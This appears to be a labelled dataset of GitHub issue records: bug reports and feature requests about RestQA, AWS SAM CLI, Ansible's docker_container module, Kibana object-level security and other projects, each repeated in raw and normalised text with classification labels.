The app functions properly but is not very intuitive to use. For example, the `edit` and `toggle completed` functions can be included with each to-do list item, similar to how the delete function is.
1.0
[todo-list] re-design ui - The app functions properly but is not very intuitive to use. For example, the `edit` and `toggle completed` functions can be included with each to-do list item similar to how the delete function is.
non_main
re design ui the app functions properly but is not very intuitive to use for example the edit and toggle completed functions can be included with each to do list item similar to how the delete function is
0
3,895
17,330,751,864
IssuesEvent
2021-07-28 01:43:30
restqa/restqa
https://api.github.com/repos/restqa/restqa
closed
Dashboard: read only on the editor
enhancement pair with maintainer
Hello 👋, ### 👀 Background The RestQA Dashboard could be deployed on a remote server. However, some teams would like to deploy the server in order to give access to all the features and run any of them. ### ✌️ What is the actual behavior? Each feature file could be updated by anyone through the dashboard UI. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa dashboard` to launch the dashboard 4. Access the dashboard through the url http://localhost:8081 5. Go to the Editor menu and update one feature file. ### 🤞 What is the expected behavior? On some team setups we would prefer not to allow the user to edit the features when the RestQA dashboard is deployed on a remote server. ### 😎 Proposed solution. In the `.restqa.yml` configuration file, we could add the property `editable` in the object `restqa.dashboard`, such as: ```yaml restqa: dashboard: editable: true ``` The default value will be true. The value could also be overridden by the environment variable `RESTQA_DASHBOARD_EDITABLE=true`, for example: ``` RESTQA_DASHBOARD_EDITABLE=false restqa dashboard ``` Or through the option `-e | --editable`: ``` restqa dashboard --editable false ``` Cheers.
True
Dashboard: read only on the editor - Hello 👋, ### 👀 Background The RestQA Dashboard could be deployed on a remote server. However some team would like to deploy the server in order to access to all the feature and run any of them. ### ✌️ What is the actual behavior? Each feature file could be updated by anyone through the dashboard UI. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa dashboard` to launch the dashboard 4. Access the dashboard through the url http://localhost:8081 5. Go to Editor menu and update one feature file. ### 🤞 What is the expected behavior? On some team setup we would prefer to not allow the user to edit the the feature when the restqa dashboard is deployed on a remote server. ### 😎 Proposed solution. On the `.restqa.yml` configuration file , we could add the property `editable` is the object `restqa.dashboard` such as : ```yaml restqa: dashboard: editable: true ``` The default value will be true. The value could also be overrode by the environment variable `RESTQA_DASHBOARD_EDITABLE=true`, example: ``` RESTQA_DASHBOARD_EDITABLE=false restqa dashboard ``` Or through the option `-e | --editable` ``` restqa dashboard --editable false ``` Cheers.
main
dashboard read only on the editor hello 👋 👀 background the restqa dashboard could be deployed on a remote server however some team would like to deploy the server in order to access to all the feature and run any of them ✌️ what is the actual behavior each feature file could be updated by anyone through the dashboard ui 🕵️‍♀️ how to reproduce the current behavior install restqa run the command restqa init to initialize a brand new project run the command restqa dashboard to launch the dashboard access the dashboard through the url go to editor menu and update one feature file 🤞 what is the expected behavior on some team setup we would prefer to not allow the user to edit the the feature when the restqa dashboard is deployed on a remote server 😎 proposed solution on the restqa yml configuration file we could add the property editable is the object restqa dashboard such as yaml restqa dashboard editable true the default value will be true the value could also be overrode by the environment variable restqa dashboard editable true example restqa dashboard editable false restqa dashboard or through the option e editable restqa dashboard editable false cheers
1
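The three override mechanisms proposed in the record above imply a resolution order; here is a sketch assuming CLI option > environment variable > config file > default (the exact precedence is an assumption — the issue lists the sources and the default of true, but not their ordering):

```python
import os

def resolve_editable(cli_option=None, config=None, environ=None):
    """Resolve the dashboard `editable` flag from the proposed sources.

    cli_option: bool or None, from `--editable`.
    config: parsed .restqa.yml as a dict, or None.
    environ: mapping, defaults to os.environ.
    """
    environ = os.environ if environ is None else environ
    if cli_option is not None:          # highest precedence: CLI option
        return cli_option
    env_value = environ.get("RESTQA_DASHBOARD_EDITABLE")
    if env_value is not None:           # then the environment variable
        return env_value.lower() == "true"
    if config is not None:              # then restqa.dashboard.editable
        value = config.get("restqa", {}).get("dashboard", {}).get("editable")
        if value is not None:
            return value
    return True                         # default per the proposal
```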
4,142
19,686,372,779
IssuesEvent
2022-01-11 22:46:09
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
closed
Unable to create dynamo table with tags
type/bug stage/bug-repro maintainer/need-response
### Description: Trying to create a dynamo table using AWS::Serverless::SimpleTable, but getting an error if I specify any tags ### Steps to reproduce: Run sam build on the template ### Observed result: PS C:\Work\Issues\AWS - SAM - dynamo table> sam build --debug 2022-01-07 12:32:12,548 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2022-01-07 12:32:12,548 | Using config file: samconfig.toml, config environment: default 2022-01-07 12:32:12,549 | Expand command line arguments to: 2022-01-07 12:32:12,549 | --template_file=C:\Work\Issues\AWS - SAM - dynamo table\template.yaml --build_dir=.aws-sam\build --cache_dir=.aws-sam\cache 2022-01-07 12:32:13,015 | 'build' command is called 2022-01-07 12:32:13,015 | Collected default values for parameters: {'Stage': 'lcl', 'OCTOEnv': 'DEV', 'TerraformTableName': 'terraform-lock-nmgr', 'AwsRegion': 'us-east-1'} 2022-01-07 12:32:13,031 | Sending Telemetry: {'metrics': [{'commandRun': {'requestId': 'a5721518-a4a2-4333-98fe-b32aa4936575', 'installationId': '2bcffb07-fa0b-4ced-a5d9-096faedc8c99', 'sessionId': '148f4db1-85c8-4eaa-9341-3358208b9bf9', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.8', 'samcliVersion': '1.37.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam build', 'metricSpecificAttributes': {'projectType': 'CFN'}, 'duration': 483, 'exitReason': 'InvalidSamDocumentException', 'exitCode': 255}}]} 2022-01-07 12:32:13,574 | HTTPSConnectionPool(host='aws-serverless-tools-telemetry.us-west-2.amazonaws.com', port=443): Read timed out. 
(read timeout=0.1) Traceback (most recent call last): File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 68, in run_plugins parser.parse(template_copy, all_plugins) # parse() will run all configured plugins File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 102, in parse raise InvalidDocumentException(document_errors) samtranslator.model.exceptions.InvalidDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 'Tags' is invalid.")] The above exception was the direct cause of the following exception: Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 166, in 
wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 124, in wrapped return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 174, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 231, in do_cli with BuildContext( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 106, in __enter__ self.set_up() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 112, in set_up self._stacks, remote_stack_full_paths = SamLocalStackProvider.get_stacks( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 242, in get_stacks current = SamLocalStackProvider( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 51, in __init__ self._template_dict = self.get_template( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_base_provider.py", line 189, in get_template template_dict = SamTranslatorWrapper(template_dict, parameter_values=parameters_values).run_plugins() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 70, in run_plugins raise InvalidSamDocumentException( samcli.commands.validate.lib.exceptions.InvalidSamDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 
'Tags' is invalid.")] ('TerraformDynamoTable', "Type of property 'Tags' is invalid.") PS C:\Work\Issues\AWS - SAM - dynamo table> ### Expected result: Expected to see dynamo table created ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 2. `sam --version`: SAM CLI, version 1.37.0 3. AWS region: us-east-1 `Add --debug fla [Log.txt](https://github.com/aws/aws-sam-cli/files/7830662/Log.txt) g to command you are running` [cloudformation-terraformresources.txt](https://github.com/aws/aws-sam-cli/files/7830660/cloudformation-terraformresources.txt)
True
Unable to create dynamo table with tags - ### Description: Traying to create dynamo table using AWS::Serverless::SimpleTable, but getting an error if I specify any tags ### Steps to reproduce: Run sam build on the template ### Observed result: PS C:\Work\Issues\AWS - SAM - dynamo table> sam build --debug 2022-01-07 12:32:12,548 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2022-01-07 12:32:12,548 | Using config file: samconfig.toml, config environment: default 2022-01-07 12:32:12,549 | Expand command line arguments to: 2022-01-07 12:32:12,549 | --template_file=C:\Work\Issues\AWS - SAM - dynamo table\template.yaml --build_dir=.aws-sam\build --cache_dir=.aws-sam\cache 2022-01-07 12:32:13,015 | 'build' command is called 2022-01-07 12:32:13,015 | Collected default values for parameters: {'Stage': 'lcl', 'OCTOEnv': 'DEV', 'TerraformTableName': 'terraform-lock-nmgr', 'AwsRegion': 'us-east-1'} 2022-01-07 12:32:13,031 | Sending Telemetry: {'metrics': [{'commandRun': {'requestId': 'a5721518-a4a2-4333-98fe-b32aa4936575', 'installationId': '2bcffb07-fa0b-4ced-a5d9-096faedc8c99', 'sessionId': '148f4db1-85c8-4eaa-9341-3358208b9bf9', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.8', 'samcliVersion': '1.37.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam build', 'metricSpecificAttributes': {'projectType': 'CFN'}, 'duration': 483, 'exitReason': 'InvalidSamDocumentException', 'exitCode': 255}}]} 2022-01-07 12:32:13,574 | HTTPSConnectionPool(host='aws-serverless-tools-telemetry.us-west-2.amazonaws.com', port=443): Read timed out. 
(read timeout=0.1) Traceback (most recent call last): File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 68, in run_plugins parser.parse(template_copy, all_plugins) # parse() will run all configured plugins File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 102, in parse raise InvalidDocumentException(document_errors) samtranslator.model.exceptions.InvalidDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 'Tags' is invalid.")] The above exception was the direct cause of the following exception: Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 166, in 
wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 124, in wrapped return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 174, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 231, in do_cli with BuildContext( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 106, in __enter__ self.set_up() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 112, in set_up self._stacks, remote_stack_full_paths = SamLocalStackProvider.get_stacks( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 242, in get_stacks current = SamLocalStackProvider( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 51, in __init__ self._template_dict = self.get_template( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_base_provider.py", line 189, in get_template template_dict = SamTranslatorWrapper(template_dict, parameter_values=parameters_values).run_plugins() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 70, in run_plugins raise InvalidSamDocumentException( samcli.commands.validate.lib.exceptions.InvalidSamDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 
'Tags' is invalid.")] ('TerraformDynamoTable', "Type of property 'Tags' is invalid.") PS C:\Work\Issues\AWS - SAM - dynamo table> ### Expected result: Expected to see dynamo table created ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 2. `sam --version`: SAM CLI, version 1.37.0 3. AWS region: us-east-1 `Add --debug fla [Log.txt](https://github.com/aws/aws-sam-cli/files/7830662/Log.txt) g to command you are running` [cloudformation-terraformresources.txt](https://github.com/aws/aws-sam-cli/files/7830660/cloudformation-terraformresources.txt)
main
unable to create dynamo table with tags description traying to create dynamo table using aws serverless simpletable but getting an error if i specify any tags steps to reproduce run sam build on the template observed result ps c work issues aws sam dynamo table sam build debug telemetry endpoint configured to be using config file samconfig toml config environment default expand command line arguments to template file c work issues aws sam dynamo table template yaml build dir aws sam build cache dir aws sam cache build command is called collected default values for parameters stage lcl octoenv dev terraformtablename terraform lock nmgr awsregion us east sending telemetry metrics httpsconnectionpool host aws serverless tools telemetry us west amazonaws com port read timed out read timeout traceback most recent call last file c program files amazon awssamcli runtime lib site packages samcli lib samlib wrapper py line in run plugins parser parse template copy all plugins parse will run all configured plugins file c program files amazon awssamcli runtime lib site packages samcli lib samlib wrapper py line in parse raise invaliddocumentexception document errors samtranslator model exceptions invaliddocumentexception the above exception was the direct cause of the following exception traceback most recent call last file runpy py line in run module as main file runpy py line in run code file c program files amazon awssamcli runtime lib site packages samcli main py line in cli prog name sam file c program files amazon awssamcli runtime lib site packages click core py line in call return self main args kwargs file c program files amazon awssamcli runtime lib site packages click core py line in main rv self invoke ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return process result sub ctx command invoke sub ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return ctx invoke self 
callback ctx params file c program files amazon awssamcli runtime lib site packages click core py line in invoke return callback args kwargs file c program files amazon awssamcli runtime lib site packages click decorators py line in new func return ctx invoke f obj args kwargs file c program files amazon awssamcli runtime lib site packages click core py line in invoke return callback args kwargs file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped raise exception pylint disable raising bad type file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped return value func args kwargs file c program files amazon awssamcli runtime lib site packages samcli lib utils version checker py line in wrapped actual result func args kwargs file c program files amazon awssamcli runtime lib site packages samcli cli main py line in wrapper return func args kwargs file c program files amazon awssamcli runtime lib site packages samcli commands build command py line in cli do cli file c program files amazon awssamcli runtime lib site packages samcli commands build command py line in do cli with buildcontext file c program files amazon awssamcli runtime lib site packages samcli commands build build context py line in enter self set up file c program files amazon awssamcli runtime lib site packages samcli commands build build context py line in set up self stacks remote stack full paths samlocalstackprovider get stacks file c program files amazon awssamcli runtime lib site packages samcli lib providers sam stack provider py line in get stacks current samlocalstackprovider file c program files amazon awssamcli runtime lib site packages samcli lib providers sam stack provider py line in init self template dict self get template file c program files amazon awssamcli runtime lib site packages samcli lib providers sam base provider py line in get template template dict 
samtranslatorwrapper template dict parameter values parameters values run plugins file c program files amazon awssamcli runtime lib site packages samcli lib samlib wrapper py line in run plugins raise invalidsamdocumentexception samcli commands validate lib exceptions invalidsamdocumentexception terraformdynamotable type of property tags is invalid ps c work issues aws sam dynamo table expected result expected to see dynamo table created additional environment details ex windows mac amazon linux etc os windows sam version sam cli version aws region us east add debug fla g to command you are running
1
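A likely explanation for the `Type of property 'Tags' is invalid` error in the record above: `AWS::Serverless::SimpleTable` takes `Tags` as a plain string-to-string map, whereas raw `AWS::DynamoDB::Table` takes a list of `{Key, Value}` objects, so pasting the list form into a SimpleTable is rejected by the SAM translator. A small validator/converter sketch (hypothetical helpers, not samtranslator code):

```python
def valid_simpletable_tags(tags) -> bool:
    """True if `tags` has the map-of-strings shape SimpleTable expects."""
    return isinstance(tags, dict) and all(
        isinstance(k, str) and isinstance(v, str) for k, v in tags.items()
    )

def dynamodb_tags_to_simpletable(tags):
    """Convert the CloudFormation list form [{Key, Value}, ...] to a map."""
    return {item["Key"]: item["Value"] for item in tags}
```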
1,672
6,574,093,878
IssuesEvent
2017-09-11 11:27:30
ansible/ansible-modules-core
https://api.github.com/repos/ansible/ansible-modules-core
closed
docker_container: unable to deal with image IDs
affects_2.2 bug_report cloud docker waiting_on_maintainer
##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - `docker_container` ##### ANSIBLE VERSION ``` ansible 2.2.0.0 config file = /home/schwarz/code/infrastructure/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT Debian GNU/Linux ##### SUMMARY `docker` allows addressing images by ID. Ansible should do the same. Otherwise it's impossible to create a container for an unnamed image. ##### STEPS TO REPRODUCE ``` sh $ docker pull alpine $ docker inspect --format={{.Id}} alpine sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 $ ansible -m docker_container -a 'name=foo image=sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 command=true' localhost ``` ##### EXPECTED RESULTS The output should be the same as from `ansible -m docker_container -a 'name=foo image=alpine command=true' localhost`. ``` localhost | SUCCESS => { "ansible_facts": {}, "changed": true } ``` ##### ACTUAL RESULTS Instead Ansible tries to pull the image by its ID and naturally fails at that. ``` localhost | FAILED! => { "changed": false, "failed": true, "msg": "Error pulling sha256 - code: None message: Error: image library/sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 not found" } ```
True
docker_container: unable to deal with image IDs - ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - `docker_container` ##### ANSIBLE VERSION ``` ansible 2.2.0.0 config file = /home/schwarz/code/infrastructure/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT Debian GNU/Linux ##### SUMMARY `docker` allows addressing images by ID. Ansible should do the same. Otherwise it's impossible to create a container for an unnamed image. ##### STEPS TO REPRODUCE ``` sh $ docker pull alpine $ docker inspect --format={{.Id}} alpine sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 $ ansible -m docker_container -a 'name=foo image=sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 command=true' localhost ``` ##### EXPECTED RESULTS The output should be the same as from `ansible -m docker_container -a 'name=foo image=alpine command=true' localhost`. ``` localhost | SUCCESS => { "ansible_facts": {}, "changed": true } ``` ##### ACTUAL RESULTS Instead Ansible tries to pull the image by its ID and naturally fails at that. ``` localhost | FAILED! => { "changed": false, "failed": true, "msg": "Error pulling sha256 - code: None message: Error: image library/sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 not found" } ```
main
docker container unable to deal with image ids issue type bug report component name docker container ansible version ansible config file home schwarz code infrastructure ansible cfg configured module search path default w o overrides configuration n a os environment debian gnu linux summary docker allows addressing images by id ansible should do the same otherwise it s impossible to create a container for an unnamed image steps to reproduce sh docker pull alpine docker inspect format id alpine ansible m docker container a name foo image command true localhost expected results the output should be the same as from ansible m docker container a name foo image alpine command true localhost localhost success ansible facts changed true actual results instead ansible tries to pull the image by its id and naturally fails at that localhost failed changed false failed true msg error pulling code none message error image library not found
1
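One way the module could support the request in the record above, sketched below: detect that the `image` value is a content-addressable ID (`sha256:` plus 64 hex digits, as in the report) and skip the registry pull, since IDs cannot be pulled by name. The helper is an illustrative assumption, not ansible code:

```python
import re

# Matches "sha256:<64 hex>" or a bare 64-hex-digit image ID.
_IMAGE_ID_RE = re.compile(r"^(sha256:)?[0-9a-f]{64}$")

def is_image_id(image: str) -> bool:
    """True if `image` looks like a content-addressable docker image ID."""
    return bool(_IMAGE_ID_RE.match(image))
```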
16,620
9,853,207,050
IssuesEvent
2019-06-19 14:21:35
elastic/kibana
https://api.github.com/repos/elastic/kibana
opened
Object Level Security
Team:Security enhancement
## Object Level Security ### ACL To enable OLS, an ACL with the following format will be attached to all securable objects: ``` { "owner": 123456789, "read": { "users": [ { id: 123456789, can_share: true } ], "roles": [ { id: "role_one", can_share: false } ] }, "write": { "users": [ { id: 123456789, can_share: true } ], "roles": [ { id: "role_one", can_share: false } ] } } ``` The users and roles above reference Elasticsearch users and roles. In addition to the Elasticsearch roles, we will utilize a role of `*` to denote all authenticated users. If the user has **write** they will implicitly be granted **read**. When a user or role is assigned **read** or **write** they will be able to specify whether this user or role will be able to share the securable object with others. If the user has **read** and they can share the object, they will only be able to add other users and roles to **read**. If the user has **write** and they can share the object, they will be able to add other users and roles to **write** and **read**. ### Implicit read permissions When a user has **read** access to a Dashboard, they will implicitly be granted **read** access to all related Visualizations and Saved Searches. The same logic will apply once Index Patterns themselves are made securable and if a user has **read** access to a Visualization or Saved Search, they will be implicitly granted **read** access to the Index Pattern. This simplifies the access model and allows users to assign access to the object that they intuitively wish to share without having to concern themselves with the graph of related objects. It also simplifies the technical implementation so we don’t have to explicitly assign access to the related objects and then determine if/when it should be removed when a parent object’s ACL is modified. 
When a user is implicitly granted **read** access to a Visualization or Saved Search, it won’t show up in the user’s list of Visualizations or Saved Searches, it will only be accessible in the Dashboard UI/API. This is similar to how we’ll implement it technically, we’ll allow users to gain access to the related objects via the Dashboard, which will implicitly be granting them **read** access. ### Summary Phase 4 will make Saved Searches, Dashboards, Visualizations, Index Patterns and other Kibana applications (Machine Learning, Graph, Timelion) saved objects securable based on the previously described ACL. When an object has no owner, it emulates the way that Kibana currently functions without OLS where all authenticated Kibana users have full permissions. This is purely to support migrations from older versions of Kibana that didn’t have OLS, or users that were running Kibana without security and then enabling security with OLS. An additional “Claim unowned object” privilege will be added to the kibana_user role, and the user will have to have this privilege to claim these unowned objects. The introduction of owned Index Patterns necessitates the addition of per-user Kibana Advanced Settings, as the default index pattern is defined here. An additional section will be added to the Advanced Settings page to allow a user to override any advanced setting, the same capability will be added to the index management page. When a securable object has no owner, they will see a dialog similar to the following allowing them to make themselves the owner: ![screen shot 2018-03-09 at 10 28 06 am](https://user-images.githubusercontent.com/627123/37424187-4d01f5f0-2796-11e8-9e8d-cc2608f420a8.png) A securable object with no owner will be represented by the non-existence of an ACL. 
When a securable object has an owner, they will see a dialog similar to the following allowing them to transfer ownership and define which users and roles can read/write the object: ![untitled](https://user-images.githubusercontent.com/627123/37487123-f870d3b8-2866-11e8-94c8-4cff349c810c.png) System administrators will always be able to transfer ownership and modify the ACL of a securable object, in case a user erroneously claims ownership of an owned object. All users that have a role granting them a Kibana custom privilege for the specific Kibana instance will be listed, and all roles that have a Kibana custom privilege for the Kibana specific instance will be listed as well. It should be noted that for Kibana to be able to fully enumerate users, we will have to introduce the concept of user profiles in Kibana (that could potentially power the user specific settings) or have Elasticsearch create users for non-native realms. Currently, Elasticsearch is unable to enumerate all users for SAML/LDAP/etc. realms as these are powered by role mappings. The list of Saved Searches, Dashboards, Visualizations and Index Patterns will have an owner column added, similar to the following: ![screen shot 2018-03-09 at 11 11 16 am](https://user-images.githubusercontent.com/627123/37424269-7553c060-2796-11e8-9d4f-3094c33469cd.png) From this phase forward, all new securable objects will be owned by the creator and they will have to share them with others. This same logic applies to objects that are imported. They will be owned by the user importing them, and can then be shared. Additional Kibana applications (Graph, Timelion) will be modified to support a similar mechanism of claiming/transferring ownership, and listing the current owner. In the future, there’s potential for the Kibana admin to be able to define default permissions for different users, or to use RBAC to limit users being able to create private or public securable objects.
However, this level of control will not be introduced in this phase, as it might not be needed and it increases the complexity and implementation time.
True
non_main
0
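The ACL semantics the Kibana issue describes (the owner has full access, the `*` role denotes all authenticated users, **write** implicitly grants **read**, and a missing ACL means an unowned object with pre-OLS full access) can be sketched as a small permission check. This is an illustrative model of the proposal, not Kibana's implementation:

```python
ALL_AUTHENTICATED = "*"  # role wildcard from the proposal

def can_read(acl, user_id, user_roles):
    # A missing ACL denotes an unowned object, which emulates
    # pre-OLS Kibana where all authenticated users have full access.
    if acl is None:
        return True
    if acl.get("owner") == user_id:
        return True
    # "write" implicitly grants "read", so check both grant levels.
    for level in ("read", "write"):
        grants = acl.get(level, {})
        if any(u["id"] == user_id for u in grants.get("users", [])):
            return True
        if any(r["id"] == ALL_AUTHENTICATED or r["id"] in user_roles
               for r in grants.get("roles", [])):
            return True
    return False

# Sample ACL mirroring the format shown in the issue body.
acl = {
    "owner": 123456789,
    "read": {"users": [], "roles": [{"id": "role_one", "can_share": False}]},
    "write": {"users": [{"id": 42, "can_share": True}], "roles": []},
}
```

A `can_write` check would look the same but inspect only the `write` grants; the `can_share` flags would gate who may edit the ACL itself.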
2,174
7,612,958,846
IssuesEvent
2018-05-01 19:26:31
walbourn/directx-sdk-samples
https://api.github.com/repos/walbourn/directx-sdk-samples
closed
Retire VS 2013 projects
maintainence
I'll be removing the VS 2013 projects in 2018. I'll continue to support VS 2015 and VS 2017
True
main
1
4,641
24,031,830,842
IssuesEvent
2022-09-15 15:35:36
ClaudiuCreanga/magento2-store-locator-stockists-extension
https://api.github.com/repos/ClaudiuCreanga/magento2-store-locator-stockists-extension
opened
Looking for maintainer
maintainer wanted
Looking for a maintainer to take control of this project and move it forward. There are new releases of magento2 and apparently some things stopped working, i.e. issue https://github.com/ClaudiuCreanga/magento2-store-locator-stockists-extension/issues/29. As I no longer work with magento, I don't have time to debug the issue. Anyone interested, post your availability here.
True
main
1
4,712
24,280,305,170
IssuesEvent
2022-09-28 16:48:15
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
closed
Issue with running SpringBoot Application using AWS Lambda in SAMCLI
stage/needs-investigation area/local/invoke area/java maintainer/need-followup
